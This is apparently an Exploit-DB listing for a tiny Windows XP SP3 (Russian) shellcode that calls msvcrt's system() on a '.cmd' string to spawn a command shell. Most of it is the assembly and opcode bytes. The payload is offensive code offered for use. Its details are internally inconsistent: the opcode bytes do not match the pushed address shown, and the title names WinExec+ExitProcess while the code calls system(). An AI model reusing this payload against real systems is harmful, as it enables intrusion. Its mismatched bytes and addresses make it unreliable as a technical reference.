ad

win32/xp sp3 (Ru) WinExec+ExitProcess cmd shellcode 12 bytes



EDB-ID: 13647 CVE: N/A OSVDB-ID: N/A
Author: lord Kelvin Published: 2010-03-24 Verified: Not Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
68 9D 61 F9 77  push 0x77C01345
B8 C7 93 C1 77  mov eax,msvcrt.system
FF D0           call eax
 
In msvcrt.dll at 0x77C01344 We have string ".cmd", that's the trick.
Code will work in WinXP SP3 Pro Rus, in other versions you'd better search
the string and system(char*) address for yourself.
 
Coded via lord Kelvin.